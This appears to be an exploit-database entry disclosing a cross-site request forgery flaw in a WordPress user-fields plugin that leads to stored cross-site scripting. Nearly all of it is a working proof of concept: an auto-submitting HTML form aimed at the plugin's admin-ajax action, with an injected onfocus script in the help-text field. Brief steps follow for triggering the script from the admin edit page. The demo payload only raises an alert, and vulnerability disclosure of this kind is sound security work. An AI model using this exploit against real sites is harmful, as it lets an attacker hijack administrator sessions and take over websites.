Share
## https://sploitus.com/exploit?id=WPEX-ID:48A3A542-9130-4524-9D19-FF9ECCECB148
Open the .html file where the admin user is logged in
```
<html>
<!-- CSRF PoC - generated by Burp Suite Professional -->
<body>
<script>history.pushState('', '', '/')</script>
<form action="http://172.28.128.6/wordpress/wp-admin/admin-ajax.php" method="POST">
<input type="hidden" name="title" value="Username" />
<input type="hidden" name="label" value="Username1" />
<input type="hidden" name="meta_key" value="user_login" />
<input type="hidden" name="placeholder" value="username1" />
<input type="hidden" name="help_text" value="asdf" onfocus="alert(123)" autofocus="" />
<input type="hidden" name="privacy" value="1" />
<input type="hidden" name="default_value" value="my-val" />
<input type="hidden" name="is_required" value="1" />
<input type="hidden" name="user_edit" value="0" />
<input type="hidden" name="icon" value="fa-user" />
<input type="hidden" name="min_length" value="3" />
<input type="hidden" name="max_length" value="30" />
<input type="hidden" name="type" value="text" />
<input type="hidden" name="action" value="userplus_admin_update_field" />
<input type="hidden" name="arg2" value="10" />
<input type="submit" value="Submit request" />
</form>
</body>
</html>
```
- Go to http://172.28.128.6/wordpress/wp-admin/post.php?post=10&action=edit
- Click on the edit button present on `UserName` row. PFA screenshot
- Click on help text and xss will be triggered